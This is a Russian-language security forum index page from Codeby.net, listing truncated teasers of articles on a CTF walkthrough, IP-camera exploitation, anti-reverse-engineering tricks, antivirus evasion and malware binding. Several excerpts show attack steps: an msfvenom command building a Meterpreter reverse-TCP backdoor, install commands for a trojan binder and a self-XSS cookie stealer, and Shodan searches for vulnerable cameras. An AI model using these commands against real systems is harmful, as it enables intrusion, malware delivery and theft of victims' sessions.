• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Форум информационной безопасности - Codeby.net

Наши ребята на Phoenix Hackathon

  • 4 006
  • 11
Одесса
26 октября

Спикерами мероприятия являются участники форума кодебай @Vander и @Sunnych

Далее текст от оргов:

Здравствуйте, мы являемся группой студентов ОНПУ специальность Информационная Безопасность. У нас появилась идея провести что то связанное с ИБ.

Кратко о мероприятии:участников ожидают выступления спикеров со всей Украины, профи своего дела список докладчиков вы можете увидеть у нас на сайте, так же мы подготовили практические квесты по различным темам php инъекции, sql инъекции, xss, обход авторизации и тд. Все это конечно же будет сопровождаться ценным и интересными призами.Вот наш сайт на котором можно узнать больше информации ( ).

На кого ориентированно мероприятие?

Материалы докладчиков будут доступны как для начинающих так и для продвинутых и вход...

Статья DEP и ASLR – игра без правил

  • 6 011
  • 4
Со времени выхода в свет Win2000 прошло уже 20 лет. Её разработчики, с чувством исполненного долга предвкушали себе счастливую старость, но грянул гром – система оказалась дырявой как сито, и на данный момент счёт её обновлениям потеряла наверное уже и сама Microsoft. Ознакомиться с установленными на вашем узле заплатками можно в командной строке, запросив systeminfo. Каждый сервис-пак SP несёт в себе кучу таких обновлений, игнорировать которым (с точки зрения безопасности) глупо.

На скорую руку заштопав старые щели, Билли сбрасывает на рынок эту-же систему под новым именем, которую ждёт та-же участь и она бумерангом прилетает обратно – круг замыкается. А виной тому хакеры, огромной ступнёй годзиллы втирающие в грязь мастдай только потому, что за свои честно/заработанные требуют товар соответствующего качества – мол если предлагаешь обществу весчь, она должна быть без изъянов. По большому счёту, только хакеры и двигают прогресс компьютерной...

Статья Misconfiguration в сервисах разработки

  • 4 366
  • 0
Час добрый, господа. По мотивам моего прошлогоднего доклада на ZeroNight сделаю статейку, того, о чем говорил я тогда...
Довелось мне как то, в один из прекрасных вечеров, проверить на уязвимость кучу сервисов связанных с разработкой и в этой статье я поделюсь находками, о которых, уже рассказывал на конференции в том году.

Misconfiguration - класс уязвимостей связанных с неправильной настройкой того или иного сервиса. Хотя на самом деле не всё оказалось мисконфигами.
Ну хватит лить воду, приступим...

Ссылка на презу:

Jira & Confluence
Описание:
Эти два продукта от компании Atlassian широко используются разработчиками.
Jira - Мощнейший таск-трекер, где ставятся задачи, отслеживается процесс их выполнения, и еще куча плюшек...

Soft Entropy: Тестируем IP-камеры

  • 8 982
  • 13
Добрый день,Уважаемые Друзья и Форумчане.
Понедельник-нелёгкое время, поэтому решил запостить что-нибудь лёгкое.

У Entynetproject Organization стали попадаться неплохие инструменты для pentest.
Автор данного инструмента enty8080.
Предназначен для тестирования и эксплуатации уязвимости wifi-камер, связанных с сервером GoAhead.

Применение рассматриваемого инструмента запрещено в незаконных целях.
Информация предоставлена исключительно для ознакомления и изучения проблем безопасности.
Будьте пожалуйста этичными.


Установка:
Код:
# git clone https://github.com/entynetproject/entropy.git
# cd entropy
# chmod +x install.sh
# ./install.sh
Опции интуитивно понятны и единственная сложность-это раздобыть ключи API shodan, или zoomeye.
Если их надумаете использовать,то команда на поиск IP-камер:
Код:
# entropy -b 2 -v --shodan API_ключ
или # python3 entropy.py -b 2 -v --shodan API_ключ
Для работы со списком из текстового файла (файл...

Статья CTF “Game of Thrones” [Перевод]

  • 4 459
  • 1
Доброго времени суток, codeby.
Первоисточник:
Перевод: Перевод выполнен от команды Codeby
Примечание от команды форума:
  • Статья является переводом.
Приветствую друзья: сегодня мы поиграем в CTF “Game of Thrones”
Образ VM и подробное описание можно найти
Автор VM: OscarAkaElvis

Приступим.
Для начала, узнаем IP виртуальной машины (В статье она находится по адресу 192.168.1.133)
Код:
netdiscover

Далее используем nmap чтобы найти открытые порты и сервисы расположенные на них
Код:
nmap -p- -sV 192.168.1.133

2.png


Мы видим, что на 80-ом порту находится веб-сервер, поэтому мы открываем ip в нашем браузере.

3.png


Посмотрев на исходный код страницы, мы увидим синтаксис флага.

[ATTACH...

Статья Установка Kali Linux на флешку с возможностью сохранять данные (самый простой метод)

  • 8 516
  • 9
Всем добрый день!

Знаю что тема избитая, старая, на нее уже есть куча статей итд. НО весь прикол в том, что не один метод мне не помог :)

Итак, решил я значит сделать флешку с кали с возможностью сохранять данные (под предлогом удобства итд.)

Сразу скажу, что данный процесс у меня занял 4 дня!!! 4 ДНЯ КАРЛ!!!
Я перепробовал все варианты какие есть, начиная с установки виртуальной машины и установки через нее кали на флешку и заканчивая разными программами, типа MiniTool Partition Wizard итд...

На флешку кали ставиться легко, а вот с сохранением данных никак не шло, данные просто не сохранялись.

Итак не буду заниматься лишней писаниной и перейду сразу к делу.

На самом деле решение на столько просто, что после него у меня был легкий шок)))

1. Берем флешку 16ГБ или больше, восстанавливаем весь объём флешки через командную строку:
  • Вводим команду diskpart
  • Вводим команду list disk
  • Выбираем диск с флешкой, прописываем select disk=1 (цифра 1 - это диск с флешкой...

Статья Entry Point – дело о пропавшем индексе (часть 2)

  • 4 287
  • 5
Вернёмся к первой части и вспомним, о чём тут вообще идёт речь..
Статья рассматривает, как при запуске приложения передать бразды фиктивной точке-входа EntryPoint. При этом РЕ-заголовок дискового файла не модифицируется, что пускает по ложному следу софт реверс-инженеринга типа анализаторы, дизассемблеры и отладчики. Акцент сделан на то, чтобы TLS-callback процедурой вмешаться в работу загрузчика LDR и перехватить точку-входа именно в стеке, а не в РЕ-заголовке файла, как это делают многие.

Загрузчик использует стек программы в качестве пусковой установки. Координаты цели в виде точки-входа, он берёт из нашего заголовка по смещению PE.28h, и дальше функцией ZwContinue() передаёт на неё управление. Наша задача как диверсантов выбрать подходящий момент и пока функция ZwContinue() ждёт от загрузчика команды "пуск", подставить в...

Статья Джоиним зловред и легитимный файл между собой

  • 5 049
  • 19
Здарова бандиты и прочая кибернечисть. С новым подгончиком.
Первоисточник:
Перевод:
Перевод выполнен от команды Codeby
Примечание от команды форума:
  • Статья является переводом.
  • Статья исключительно в ознакомительных целях.
Инструмент Trojanizer использует WinRAR (SFX), чтоб сжать два файла между собой и преобразовать их в исполняемый архив SFX (.exe). SFX-архив при работе запускает оба файла (наш payload и легальное приложение одновременно).

Откуда скачать?

git clone https://github.com/r00t-3xp10it/trojanizer.git

Далее создаем пейлоад, используя msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe

1571250825094.png


[COLOR=rgb(251...

Статья Обход антивируса с помощью Метасплоита

  • 11 565
  • 15
Первоисточник:
Перевод: Перевод выполнен от команды Codeby
Примечание от команды форума:
  • Статья является переводом.
  • Метерпретер - это очень мощный по функционалу и основной payload для Metasploit.
  • В статье рассматривается способ обхода антивируса при создании нагрузки в метасплоите.
1571225815575.png


Дисклеймер: Эта статья создана исключительно в ознакомительных целях. Автор не одобряет и не поощряет использование информации в противозаконных целях. Всю ответственность за твои действия несешь только ты.

Все инструменты, обсуждаемые в этом посте, являются общедоступными. В процессе я объясню обход IPS ((Intrusion Prevention System) системы...

Soft self-xss или как ещё заполучить cookie

  • 5 208
  • 17
Вновь всех приветствую.
Ещё одна короткая заметка будет о том,как ещё можно выкрасть IP и Cookie жертвы.

Поможет нам в этом автор утилиты thelinuxchoice.
Он же автор таких инструментов как ShellPhish и Blackeye

Основой способа является ,опять-таки,социальная инженерия и сервис коротких ссылок Bitly.
Атака такого плана была задумана над получением контроля web-счетов жертв путём их обмана.
А именно,за счёт принуждения перехода по ссылке с вредоносным кодом,который выполняется в браузере.
Злоумышленник получает данные IP-адреса,User-Agent и Cookie жертвы.

Информация предоcтавлена исключительно для ознакомления.
Автор утилиты,автор обзора и Администрация ресурса напоминают об ответственности в случае незаконного применения рассматриваемого инструмента.


Установка:
Код:
# git clone https://github.com/thelinuxchoice/self-xss.git
# cd self-xss
# bash self-xss.sh

В утилиту встроена функция редиректа на тот ресурс,который требуется...